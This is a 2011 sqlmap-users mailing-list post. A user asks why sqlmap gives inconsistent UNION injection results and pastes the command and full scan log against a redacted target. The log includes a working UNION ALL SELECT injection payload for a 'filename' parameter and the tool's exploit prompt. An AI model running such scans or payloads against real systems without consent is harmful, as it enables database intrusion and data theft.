Re: [sqlmap-users] MySQL Union technique gives out inconsistent results
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] MySQL Union technique gives out inconsistent results
|
From: Joahnna M. D. <dam...@ya...> - 2011-07-12 13:39:42
|
Note: I just updated my sqlmap version. I'm now running the r4258. --- On Tue, 7/12/11, Joahnna Marie Damiao <dam...@ya...> wrote: From: Joahnna Marie Damiao <dam...@ya...> Subject: [sqlmap-users] MySQL Union technique gives out inconsistent results To: sql...@li... Date: Tuesday, July 12, 2011, 3:32 PM Hi, Below is the sqlmap command. Next time I ran it, it already says that the parameter filename is not injectable. However, I always get an info that the target URL is UNION injectable but the number of columns change every session. I also used the --technique=U --dbms=mysql --flush-session --level=3 --risk=3 and even the --time-sec=2 but I only get UNION injectable message but nothing is vulnerable. What seems to be the problem here? Anybody can help me? C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --b atch --beep sqlmap/1.0-dev (r4221) - automatic SQL injection and database takeover tool http://www.sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 14:39:37 [14:39:37] [INFO] setting file for logging HTTP traffic [14:39:37] [INFO] testing connection to the target url [14:39:38] [INFO] searching for forms [#1] form: [INFO] GET xxxxxxxxx do you want to test this form? [Y/n/q] > Y Edit GET data [default: xxxxxxxx do you want to fill blank fields with random values? [Y/n] Y [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\xxxx\session' as sessi on file [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' as results file [14:39:38] [INFO] testing if the url is stable, wait a few seconds [14:39:39] [INFO] url is stable [14:39:39] [INFO] testing if GET parameter 'productid' is dynamic [14:39:39] [WARNING] GET parameter 'productid' appears to be not dynamic [14:39:39] [WARNING] heuristic test shows that GET parameter 'productid' might n ot be injectable [14:39:39] [INFO] testing sql injection on GET parameter 'productid' [14:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries' [14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [14:39:41] [INFO] testing 'Oracle AND time-based blind' [14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [14:39:42] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. you can try to explicitly set it using the --dbms optio n [14:39:44] [WARNING] GET parameter 'productid' is not injectable [14:39:44] [INFO] testing if GET parameter 'name' is dynamic [14:39:44] [WARNING] GET parameter 'name' appears to be not dynamic [14:39:44] [WARNING] heuristic test shows that GET parameter 'name' might not be injectable [14:39:44] [INFO] testing sql injection on GET parameter 'name' [14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries' [14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [14:39:46] [INFO] testing 'Oracle AND time-based blind' [14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [14:39:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [14:39:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:51] [WARNING] GET parameter 'name' is not injectable [14:39:51] [INFO] testing if GET parameter 'filename' is dynamic [14:39:52] [WARNING] GET parameter 'filename' appears to be not dynamic [14:39:52] [WARNING] heuristic test shows that GET parameter 'filename' might no t be injectable [14:39:52] [INFO] testing sql injection on GET parameter 'filename' [14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [14:39:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries' [14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [14:39:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minut es and rerun without flag T in --technique option (e.g. --flush-session --techni que=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2) [14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [14:39:56] [INFO] testing 'Oracle AND time-based blind' [14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [14:39:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [14:40:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:07] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:09] [CRITICAL] unable to connect to the target url or proxy [14:40:09] [INFO] target url appears to be UNION injectable with 10 columns [14:40:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:13] [CRITICAL] unable to connect to the target url or proxy [14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable GET parameter 'filename' is vulnerable. Do you want to keep testing the others? [y/N] N sqlmap identified the following injection points with a total of 414 HTTP(s) req uests: --- Place: GET Parameter: filename Type: UNION query Title: Generic UNION query (NULL) - 1 to 10 columns Payload: productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, 'xsD iekxuxW', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Aege'='Aege&cre ationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isacti ve=on&comment=uPni --- do you want to exploit this SQL injection? [Y/n] Y [14:40:13] [INFO] testing MySQL [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the next form [14:40:16] [INFO] you can find results of scanning in multiple targets mode insi de the CSV file 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' [*] shutting down at 14:40:16 -----Inline Attachment Follows----- ------------------------------------------------------------------------------ All of the data generated in your IT infrastructure is seriously valuable. Why? It contains a definitive record of application performance, security threats, fraudulent activity, and more. Splunk takes this data and makes sense of it. IT sense. And common sense. http://p.sf.net/sfu/splunk-d2d-c2 -----Inline Attachment Follows----- _______________________________________________ sqlmap-users mailing list sql...@li... https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
